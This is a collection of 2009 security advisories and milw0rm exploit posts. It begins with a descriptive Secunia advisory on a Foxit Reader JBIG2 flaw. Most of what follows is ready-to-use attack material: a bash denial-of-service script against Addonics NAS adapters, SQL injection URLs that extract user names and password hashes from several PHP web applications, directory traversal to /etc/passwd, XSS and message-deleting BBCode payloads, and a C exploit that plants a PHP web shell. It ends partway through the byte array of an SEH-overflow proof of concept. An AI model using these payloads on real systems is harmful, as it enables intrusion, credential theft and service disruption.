Foxit Reader JBIG2 Symbol Dictionary Processing Vulnerability

Secunia Research 09/03/2009

- Foxit Reader JBIG2 Symbol Dictionary Processing Vulnerability -


Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

1) Affected Software

* Foxit Reader version 3.0.2009.1301

NOTE: Prior versions may also be affected.

2) Severity

Rating: Highly critical
Impact: System access
Where: Remote

3) Vendor's Description of Software

"As a small and fast PDF viewer, Foxit Reader currently has over 50
million users all around the world. After keeping users waiting for
almost two months, Foxit Reader 3.0 has been released and introduces
many fascinating new features such as multimedia design and Foxit
OnDemand Content Management."

Product Link:
http://www.foxitsoftware.com/pdf/rd_intro.php

4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Foxit Reader, which
can be exploited by malicious people to potentially compromise a
user's system.

The vulnerability is caused due to an error when processing JBIG2
symbol dictionary segments. This can be exploited to dereference
uninitialised memory via a specially crafted PDF file.

Successful exploitation may allow execution of arbitrary code.

5) Solution

Update to version 3.0 Build 1506 or version 2.3 Build 3902.

6) Time Table

27/02/2009 - Vendor notified.
28/02/2009 - Vendor response.
09/03/2009 - Public disclosure.

7) Credits

Discovered by Alin Rad Pop, Secunia Research.

8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-0191 for the vulnerability.

9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-11/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

Addonics NAS Adapter Post-Auth Denial of Service Exploit

#!/bin/bash
######################################################
# Addonics NAS Adapter Post-Auth DoS
# Tested against R3282-1.33c LOADER32 1.15, and NASU2FW41 Loader 1.17
# Coded by Mike Cyr, aka h00die
# mcyr2 at csc dot_____________com
# Notes: Any of these BoF crashes the entire stack from the web GUI
# so throw a GET, and bye bye baby!
# Greetz to muts and loganWHD, I tried harder
# http://www.offensive-security.com/offsec101.php turning script kiddies into ninjas daily
# Log: Vendor notification feb 9, 2009 for BoF in R3282-1.33c LOADER32 1.15 firmware
# March 8, 2009: Second vendor notification for BoF in NASU2FW41 Loader 1.17 firmware
# March 9, 2009: Code release on Milw0rm, Bid sent.
######################################################

echo "Addonics NAS Adapter Post-Auth DoS"
echo "Written by H00die"

echo "------------------------"
echo "Addonics IP:"
read -e IP
echo "Addonics GUI Username:"
read -e USERNAME
echo "Addonics GUI Password:"
read -e PASSWORD

echo "-----------------------"
echo "Select Buffer:"
echo "1. FTP: Username (R3282-1.33c LOADER32 1.15)"
echo "2. FTP: Password (R3282-1.33c LOADER32 1.15)"
echo "3. SMB: Username (R3282-1.33c LOADER32 1.15)"
echo "4. SMB: Password (R3282-1.33c LOADER32 1.15, NASU2FW41 Loader 1.17)"
echo "5. FTP: Username (NASU2FW41 Loader 1.17)"
echo "6. FTP: Password (NASU2FW41 Loader 1.17)"
echo "7. SMB: Username (NASU2FW41 Loader 1.17)"

read -e BOF

echo ""
echo "-----------------------"
echo "Sending Malicious GET request"
case "$BOF" in
'1')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Account_passwd=a&ftp_att=W;"
;;
'2')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=a&Account_passwd=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&ftp_att=W;"
;;
'3')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data1=test&data2=0;"
;;
'4')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=a&data1=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data2=0;"
;;
'5')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Account_passwd=a&ftp_att=W;"
;;
'6')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=a&Account_passwd=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&ftp_att=W;"
;;
'7')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data1=test&data2=0;"
;;
esac

echo "Stack Smashed..."

# milw0rm

PHP-Fusion Mod Book Panel (bookid) SQL Injection Vulnerability

PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability

Author: elusiven from Poland
Contact: elusivenpl@gmail.com
Greetings: Fusi0n Group

Exploit:
http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users--
http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_password,4,5,6+from+fusion_users--

# milw0rm

phpCommunity 2.1.8 (SQL/DT/XSS) Multiple Vulnerabilities

Application: phpCommunity 2
Version: 2.1.8
Website: http://sourceforge.net/projects/phpcommunity2/

Bugs: [A] Multiple SQL Injection
[B] Directory Traversal
[C] Reflected XSS

Exploitation: Remote

Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com

Menu

1) Bugs
2) Code
3) Fix

Bugs

This web application presents several vulnerabilities
which can be exploited to obtain reserved information.
The following are examples of vulnerabilities
discovered in this application.


- [A] Multiple SQL Injection

Requisites: magic_quotes_gpc = off
File affected: module/forum/class_forum.php
module/forum/class_search.php

This bug allows a guest to view username and
password of a registered user.


- [B] Directory Traversal

Requisites: none
File affected: module/admin/files/show_file.php,
module/admin/files/show_source.php

This bug allows a guest to read arbitrary files and
directory on the web server.


- [C] Reflected XSS

Requisites: none
File affected: templates/1/login.php

Code


- [A] Multiple SQL Injection

http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1' UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1' UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25" UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23


- [B] Directory Traversal

http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd

http://www.site.com/path/module/admin/files/show_source.php?path=/etc


- [C] Reflected XSS

http://www.site.com/path/templates/1/login.php?msg= script alert('XSS'); /script

Fix

No fix.

# milw0rm

CS-Cart 2.0.0 Beta 3 (product_id) SQL Injection Vulnerability

CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability
Provider: www.cs-cart.com
Discovered by netsoul
Greetz: m1cr0n, IvanKalet, blackfalcon, str0ke
Contact: netsoul2[at]gmail.com
ALTO PARANA - PARAGUAY
Ñane mba'e teete

Exploit:

http://cs-cart cms/[path]/index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*

# milw0rm

Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities

Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities

by Juri Gianni aka yeat - staker[at]hotmail[dot]it
thanks to s3rg3770

Vulnerabilities: BBCode IMG / XSS / Delete PM / Full Path Disclosure / URL Redirection

BBCode IMG Tag Script Injection
[img]http://[host][/img]

Delete Private Messages (BBCode IMG Tag Script Injection)

Insert into a (forum message/private message/your signature) the code below:
[img]http://[host]/[path]/wbb/index.php?page=PM&action=delete&pmID=[ID]&folderID=0[/img]
The fake image doesn't show errors.

Cross Site Scripting

http://[host]/[path]/wcf/acp/dereferrer.php?url=javascript:alert("Example");
you can bypass the magic_quotes_gpc with String.FromCharCode function.


URL Redirection

http://[host]/[path]/wcf/acp/dereferrer.php?url=http://[host]
http://[host]/[path]/wbb/?page=ThreadAction&action=deleteAll&boardID=1&url=[local URL]

Full Path Discloscure

http://[host]/[path]/wbb/index.php?page=[]
it works on < 3.0.8 version only.

# milw0rm

PHPRecipeBook 2.24 (base_id) Remote SQL Injection Vulnerability

PHPRecipeBook 2.24 (_id)Remort SQL Injection Vulnerability

Discovered By d3b4g
script: http://phprecipebook.sourceforge.net/demo/phprecipebook/
Greetz : str0ke | Inerd | & friends
Follow me on twitter www.twitter.com/schaba


About:

PHPRecipeBook is a Web-based cookbook with the
ability to create shopping lists from recipes selected.
The lists can be saved and later reloaded and edited.
The shopping list also attempts to combine similar items
so that duplication does not occur.



/* start

0x1

Proof of concept
-------------------------------------

Exploit:http:localhost.com[path]index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--

Demo:1 http://phprecipebook.sourceforge.net/demo/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--

Demo:2 http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--


/* end

From Tiny Little island of Maldivies

# milw0rm

PHP Director <= 0.21 (sql into outfile) eval() Injection Exploit

#include
#include
#include
#include
#include
#include

/* Dork "Powered by PHP Director 0.2"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| PHP Director 0.2.1 (sql into outfile) eval() Injection Exploit |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

{Exploit}-> index.php?cat=%27+UNION+SELECT+1,'lol',3,4,5,6,7,8,9,10,11,12,13,14,15+INTO+OUTFILE+'/var/www/ex.php'/*
{PHP.ini}-> Magic Quotes off
{Written}-> by Juri Gianni aka yeat - staker[at]hotmail[dot]it
{WhereIs}-> http://sourceforge.net/projects/phpdirector/
{Compile}-> gcc -o exploit exploit.c


{Details}-> index.php (line 56-58)

56. }elseif (isset($_GET["cat"])) {
57. $cat = $_GET["cat"];
58. $_query = sprintf("SELECT SQL_CALC_FOUND_ROWS * FROM pp_files WHERE `category` = '$cat etc..)

{Bug}-> $cat variable is not checked so we have a sql injection
{Fix}-> $cat = mysql_real_escape_string($_GET['cat']);



yeat@lulz:~/Desktop$ gcc -o exploit exploit.c
yeat@lulz:~/Desktop$ ./exploit localhost /cms /var/www/shell.php
Exploit successful..shell: /var/www/shell.php

*/



#define GET "GET %s/index.php?cat=%s HTTP/1.1\r\n" \
"Host: %s\r\n" \
"User-Agent: Links (2.1pre26; Linux 2.6.19-gentoo-r5 x86_64; x)\r\n" \
"Connection: close\r\n\r\n"

#define Exec "'+UNION+SELECT+1,2,3,4,''"\
",6,7,8,9,10,11,12,13,14,15+INTO+OUTFILE+'%s'"


char *getHost (char *host)
{
struct hostent *hp;
struct in_addr **y;

hp = gethostbyname(host);
y = (struct in_addr **)hp->h_addr_list;

return inet_ntoa(**y);
}


int main (int argc,char **argv)
{
int server,leak;
char data[1024],html[1024];
char packet[500],loadsf[500];

struct sockaddr_in addr;

if (argc < 3) {
printf("Usage: %s host path file\n",argv[0]);
printf("RunEx: %s localhost /cms /var/www/shell.php\n",argv[0]);
exit(0);
}

server = socket(AF_INET,SOCK_STREAM,0);

addr.sin_family = AF_INET;
addr.sin_port = htons((int)80);
addr.sin_addr.s_addr = inet_addr(getHost(argv[1]));

leak = connect(server,(struct sockaddr*)&addr,sizeof(addr));

if (leak < 0) {
printf("connection refused..try again\n");
exit(0);
}

snprintf(loadsf,sizeof(loadsf),Exec,argv[3]);
strncat(loadsf,"%23",sizeof(loadsf));
snprintf(packet,sizeof(packet),GET,argv[2],loadsf,argv[1]);

if (send(server,packet,sizeof(packet),0) < 0) {
printf("data sent error..\n");
}

while(recv(server,html,sizeof(html),0) > 0)
{
if (strstr(html,"MySQL") || strstr(html,"mysql_fetch_array")) {
printf("Exploit unsuccessful..\n"); break;
}
else {
printf("Exploit successful..shell: %s\n",argv[3]); break;
}
}

return 0;
}

#milw0rm

eZip Wizard 3.0 Local Stack Buffer Overflow PoC (SEH)

ezip wizard Local Stack Buffer Overflow (SEH) POC
SEH chain of main thread
Address SE handler
0012FC60 58585858
0012FC60 41414141 AAAA Pointer to next SEH record

Old bug ,still not fixed by vendors ,this kind of file can cause problems to a lot of soft of this kind.
Ex: ZipGenius stack buffer overflow (SEH overwrite)
zip it fast format string buffer overflow
Power zip 7.2 stack buffer overflow
and so on..

#include
#include
#include



char file[] =
{
0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB7, 0xAC, 0xCE, 0x34, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x08, 0x00, 0x00, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x66, 0x66, 0x64, 0x73, 0x75, 0x69, 0x62, 0x7A, 0x65, 0x6F, 0x69, 0x76, 0x7A, 0x20, 0x66, 0x68,
0x65, 0x6F, 0x20, 0x79, 0x66, 0x6F, 0x7A, 0x69, 0x61, 0x71, 0x20, 0x6F, 0x69, 0x65, 0x61, 0x7A,
0x75, 0x20, 0x7A, 0x71, 0x6F, 0x66, 0x68, 0x75, 0x65, 0x7A, 0x71, 0x6F, 0x69, 0x65, 0x6E, 0x66,
0x65, 0x7A, 0x6A, 0x75, 0x71, 0x63, 0x62, 0x75, 0x71, 0x70, 0x7A, 0x61, 0x7A, 0x69, 0x27, 0x74,
0x75, 0x72, 0x65, 0x6F, 0x7A, 0x6E, 0x62, 0x69, 0x6A, 0x75, 0x76, 0x62, 0x67, 0x73, 0x64, 0x75,
0x69, 0x71, 0x79, 0x72, 0x7A, 0x61, 0x6A, 0x20, 0x62, 0x63, 0x73, 0x64, 0x6F, 0x70, 0x69, 0x75,
0x72, 0x79, 0x7A, 0x6F, 0x65, 0x61, 0x71, 0x6E, 0x62, 0x69, 0x6F, 0x64, 0x73, 0x79, 0x72, 0x66,
0x65, 0x7A, 0x71, 0x6F, 0x69, 0x70, 0x62, 0x75, 0x66, 0x63, 0x73, 0x71, 0x69, 0x75, 0x79, 0x72,
0x61, 0x7A, 0x62, 0x69, 0x6A, 0x65, 0x66, 0x62, 0x68, 0x73, 0x75, 0x69, 0x71, 0x76, 0x64, 0x73,
0x71, 0x69, 0x6A, 0x62, 0x66, 0x65, 0x7A, 0x71, 0x75, 0x61, 0x66, 0x64, 0x64, 0x64, 0x64, 0x64,
0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x64, 0x68, 0x68,
0x68, 0x68, 0x68, 0x68, 0x68, 0x68, 0x68, 0x68, 0x68, 0x68, 0x68, 0x68, 0x68, 0x75, 0x75, 0x75,
0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x75, 0x68, 0x76, 0x71, 0x24, 0x69, 0x66, 0x72, 0x7A,
0x65, 0x6F, 0x62, 0x76, 0x69, 0x6F, 0x7A, 0x65, 0x71, 0x66, 0x74, 0x72, 0x65, 0x6F, 0x7A, 0x71,
0x6A, 0x6E, 0x62, 0x76, 0x64, 0x73, 0x70, 0x69, 0x79, 0x75, 0x66, 0x71, 0x6F, 0x65, 0x69, 0x68,
0x66, 0x72, 0x6F, 0x75, 0x65, 0x7A, 0x68, 0x61, 0x72, 0x62, 0x20, 0x69, 0x76, 0x66, 0x64, 0x73,
0x70, 0x6F, 0x68, 0x6A, 0x72, 0x65, 0x71, 0x6F, 0x75, 0x68, 0x66, 0x7A, 0x65, 0x61, 0x71, 0x75,
0x68, 0x76, 0x71, 0x6F, 0x75, 0x68, 0x65, 0x66, 0x6F, 0x71, 0x73, 0x69, 0x6A, 0x68, 0x64, 0x6F,
0x73, 0x71, 0x68, 0x76, 0x64, 0x6F, 0x69, 0x68, 0x7A, 0x61, 0x71, 0x6F, 0x65, 0x69, 0x68, 0x66,
0x64, 0x73, 0x6F, 0x69, 0x75, 0x68, 0x76, 0x63, 0x78, 0x77, 0x69, 0x75, 0x68, 0x66, 0x71, 0x6F,
0x75, 0x69, 0x68, 0x76, 0x77, 0x78, 0x6F, 0x69, 0x68, 0x66, 0x64, 0x73, 0x71, 0x6F, 0x69, 0x68,
0x76, 0x64, 0x73, 0x71, 0x6F, 0x69, 0x75, 0x68, 0x7A, 0x67, 0x66, 0x6F, 0x69, 0x68, 0x73, 0x64,
0x71, 0x6F, 0x69, 0x75, 0x68, 0x67, 0x7A, 0x65, 0x71, 0x6F, 0x69, 0x68, 0x67, 0x73, 0x71, 0x6F,
0x69, 0x68, 0x67, 0x7A, 0x61, 0x65, 0x7A, 0x72, 0x75, 0x79, 0x61, 0x75, 0x79, 0x74, 0x61, 0x65,
0x70, 0x69, 0x75, 0x79, 0x55, 0x59, 0x54, 0x4F, 0x5A, 0x52, 0x45, 0x50, 0x49, 0x48, 0x47, 0x41,
0x5A, 0x55, 0x59, 0x56, 0x44, 0x53, 0x4F, 0x49, 0x59, 0x54, 0x41, 0x50, 0x4F, 0x49, 0x55, 0x45,
0x59, 0x52, 0x49, 0x55, 0x45, 0x5A, 0x59, 0x47, 0x42, 0x4B, 0x4A, 0x43, 0x58, 0x4E, 0x4B, 0x56,
0x4E, 0x4B, 0x43, 0x58, 0x42, 0x57, 0x56, 0x4B, 0x4A, 0x4E, 0x42, 0x43, 0x58, 0x48, 0x42, 0x4B,
0x4A, 0x44, 0x48, 0x46, 0x4F, 0x49, 0x48, 0x5A, 0x45, 0x52, 0x4F, 0x49, 0x55, 0x48, 0x45, 0x5A,
0x55, 0x49, 0x4F, 0x41, 0x42, 0x45, 0x5A, 0x55, 0x49, 0x42, 0x47, 0x55, 0x49, 0x56, 0x43, 0x50,
0x4C, 0x44, 0x53, 0x47, 0x57, 0x4B, 0x52, 0x54, 0x42, 0x4E, 0x49, 0x55, 0x43, 0x49, 0x55, 0x4F,
0x51, 0x45, 0x42, 0x48, 0x52, 0x55, 0x49, 0x59, 0x44, 0x46, 0x51, 0x50, 0x5A, 0x49, 0x55, 0x45,
0x52, 0x50, 0x49, 0x55, 0x44, 0x59, 0x46, 0x54, 0x50, 0x41, 0x49, 0x5A, 0x55, 0x45, 0x59, 0x52,
0x5A, 0x45, 0x55, 0x48, 0x52, 0x54, 0x49, 0x55, 0x50, 0x56, 0x58, 0x57, 0x4B, 0x4A, 0x43, 0x4E,
0x48, 0x42, 0x47, 0x50, 0x46, 0x4F, 0x49, 0x55, 0x50, 0x41, 0x49, 0x52, 0x59, 0x45, 0x5A, 0x4F,
0x41, 0x49, 0x54, 0x59, 0x38, 0x37, 0x33, 0x32, 0x39, 0x35, 0x36, 0x35, 0x39, 0x34, 0x38, 0x33,
0x32, 0x36, 0x35, 0x46, 0x53, 0x34, 0x38, 0x59, 0x46, 0x44, 0x53, 0x39, 0x38, 0x59, 0x55, 0x56,
0x47, 0x30, 0x39, 0x38, 0x51, 0x59, 0x55, 0x52, 0x30, 0x39, 0x38, 0x34, 0x59, 0x35, 0x32, 0x33,
0x39, 0x38, 0x41, 0x59, 0x39, 0x46, 0x38, 0x45, 0x51, 0x59, 0x5A, 0x35, 0x39, 0x38, 0x59, 0x36,
0x39, 0x38, 0x46, 0x47, 0x59, 0x39, 0x38, 0x51, 0x59, 0x39, 0x47, 0x46, 0x44, 0x53, 0x55, 0x59,
0x30, 0x39, 0x48, 0x34, 0x5A, 0x48, 0x33, 0x37, 0x38, 0x35, 0x32, 0x33, 0x31, 0x42, 0x34, 0x47,
0x38, 0x30, 0x47, 0x46, 0x44, 0x53, 0x55, 0x49, 0x42, 0x56, 0x51, 0x49, 0x55, 0x4F, 0x59, 0x50,
0x52, 0x39, 0x5A, 0x48, 0x46, 0x44, 0x53, 0x51, 0x55, 0x49, 0x47, 0x46, 0x47, 0x44, 0x55, 0x53,
0x53, 0x53, 0x53, 0x53, 0x45, 0x47, 0x46, 0x39, 0x32, 0x47, 0x35, 0x33, 0x34, 0x55, 0x47, 0x46,
0x39, 0x49, 0x53, 0x50, 0x47, 0x42, 0x55, 0x54, 0x50, 0x5A, 0x39, 0x38, 0x59, 0x35, 0x33, 0x41,
0x41, 0x42, 0x43, 0x43, 0x46, 0x52, 0x45, 0x43, 0x43, 0x45, 0x54, 0x52, 0x45, 0x5A, 0x47, 0x52,
0x46, 0x44, 0x53, 0x49, 0x4F, 0x5A, 0x48, 0x45, 0x52, 0x42, 0x4E, 0x4F, 0x56, 0x46, 0x44, 0x53,
0x4F, 0x49, 0x52, 0x48, 0x54, 0x4F, 0x5A, 0x49, 0x4E, 0x46, 0x47, 0x44, 0x4B, 0x4E, 0x46, 0x43,
